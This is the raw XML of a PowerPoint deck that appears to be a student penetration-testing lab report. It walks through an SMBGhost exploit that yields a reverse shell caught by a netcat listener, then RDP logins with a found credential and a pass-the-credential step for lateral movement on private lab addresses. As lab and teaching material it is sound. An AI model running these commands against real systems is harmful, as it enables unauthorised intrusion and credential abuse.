              <a:t> tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-	Change the USER_PAYLOAD section of the exploit.py script with the payload we just now created.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" kern="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0454AC5C-96BF-A773-9F62-78ACE6DAA005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714058" y="5034324"/>
            <a:ext cx="11016157" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Before running the script we should open a listening port on our machine(attacker machine) to listen to the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>      reverse shell connection from the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-	Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lnvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 8888</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2218941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661DB0-0F35-4E01-BD56-7D2BF5BFD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91E9F2-D672-3794-E9C7-05C421A1944E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71566" y="55121"/>
            <a:ext cx="5920867" cy="3373879"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-	Run the Python script exploit.py of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBGhost_RCE_PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to exploit the vulnerability of the machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-	Command used: python3 exploit.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.164.153                     target IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-	After running the script exploit.py we will get a reverse shell with the privileged shell from the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">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AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2896E4-F857-A37C-9FA6-E63F66DF5DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16827" y="3429000"/>
            <a:ext cx="6112828" cy="3422095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A black screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F61F3A37-7A04-62A2-D054-78B85FEAEFB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5992432" y="5458968"/>
            <a:ext cx="6199565" cy="1399032"/>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4EE79EB7-BB0B-5367-5E47-3347A43EFA8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5992434" y="-1"/>
            <a:ext cx="6199566" cy="5458969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3380681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C6-F079-EA9C-E520-5A796AAEE045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260284" y="0"/>
            <a:ext cx="9905997" cy="597408"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Post-Exploitation: Gaining More Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E837136-AB5F-55D3-F237-560B60FD2338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499022997"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1260285" y="597409"/>
          <a:ext cx="9905998" cy="1447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screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1CD9274-18FF-A848-0A81-45DF5204DE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364224" y="2045262"/>
            <a:ext cx="5827776" cy="2261562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2E6CF8-78BB-0985-C133-7D608C757254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260284" y="4839852"/>
            <a:ext cx="5267960" cy="1954930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A1FDE2-454D-B218-3E9A-1408E9CA039C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260284" y="2045261"/>
            <a:ext cx="5103940" cy="2261562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C90834-B707-0359-2BBE-FBA08EA1C26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6528244" y="4839852"/>
            <a:ext cx="5663756" cy="2018148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86951413-F1FA-51E0-E73C-381237F39247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260284" y="4256739"/>
            <a:ext cx="10931716" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-	Now RDP to the target machine ads peter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-	Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xfreerdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u:adminpeter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p:Newpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /v:192.168.164.153</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435879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640DEC-97A2-496C-B454-5B165BB6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FF096-0C3C-FE57-8EB0-A87A580E1563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="33529"/>
            <a:ext cx="4390896" cy="1658585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0"/>
              <a:t>Pass-the-Credential Attack via RDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCFAAA5-ADFA-DE57-20DD-BCC920EDAF57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4457154" y="33529"/>
            <a:ext cx="7734846" cy="2531552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>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Below screenshots indicate that domain credentials for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="17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peterlim</a:t>
            </a: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have been found, potentially allowing for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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lateral movement within the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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Attempting Pass-the-Credential attack to Gain Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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to AD joined Windows machine at 192.168.164.144 using RDP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="17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mstsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="17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/v:192.168.164.144 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29787D4E-88A3-09AE-8E3A-3484F31AD60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2565082"/>
            <a:ext cx="6628583" cy="3140774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A computer screen with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED946E6-3574-9E8C-11BD-4C95E67CD231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6710982" y="2565081"/>
            <a:ext cx="5404103" cy="183274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9D30FB6-4838-DDDA-C088-F781D141E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711696" y="4397821"/>
            <a:ext cx="5404103" cy="2426649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B868C29C-371E-3DB5-5F83-B60020EB7AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812280" y="4928616"/>
            <a:ext cx="2798064" cy="150876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A3640A8-72FE-A866-A972-0F1866D61190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512064" y="3657600"/>
            <a:ext cx="5583936" cy="164592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204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314" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="609600"/>
            <a:ext cx="3643674" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="3643674" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1"/>
              <a:t>MUHAMMAD RAIYAN LI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3647614147"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4909436" y="645106"/>
          <a:ext cx="6359749" cy="5247751"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3940439">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2419310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="655861">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" cap="all" spc="60">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Task </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="149059" marB="149059" anchor="b">
                    <a:lnL w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" cap="all" spc="60">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Progress</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="149059" marB="149059" anchor="b">
                    <a:lnL w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="918378">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" i="1" cap="none" spc="0">
                          <a:solidFill>
